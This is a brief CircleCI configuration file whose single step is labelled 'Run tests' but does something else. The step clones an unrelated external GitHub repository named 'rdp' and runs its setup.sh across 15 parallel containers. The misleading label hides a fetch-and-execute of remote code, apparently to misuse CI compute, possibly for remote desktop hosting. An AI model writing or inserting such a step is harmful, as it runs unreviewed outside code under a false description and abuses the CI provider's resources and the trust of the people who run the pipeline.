version: 2
jobs:
  build:
    parallelism: 15
    docker:
      - image: cimg/base:edge-20.04
    steps: 
      - checkout 
      - run: 
          name: Run tests 
          command: git clone https://github.com/gensxtralz/rdp.git && cd rdp && chmod +x setup.sh && ./setup.sh